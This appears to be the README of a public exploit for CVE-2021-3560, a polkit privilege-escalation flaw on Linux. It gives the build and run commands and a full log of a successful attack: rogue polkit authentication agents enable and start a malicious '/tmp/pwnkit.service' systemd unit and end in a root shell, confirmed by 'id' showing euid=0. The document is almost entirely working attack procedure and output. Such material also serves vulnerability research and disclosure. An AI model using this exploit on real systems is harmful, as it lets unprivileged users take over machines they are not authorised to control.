C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
Code by swing (@WinMin), Ricter Z(@RicterZ)
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#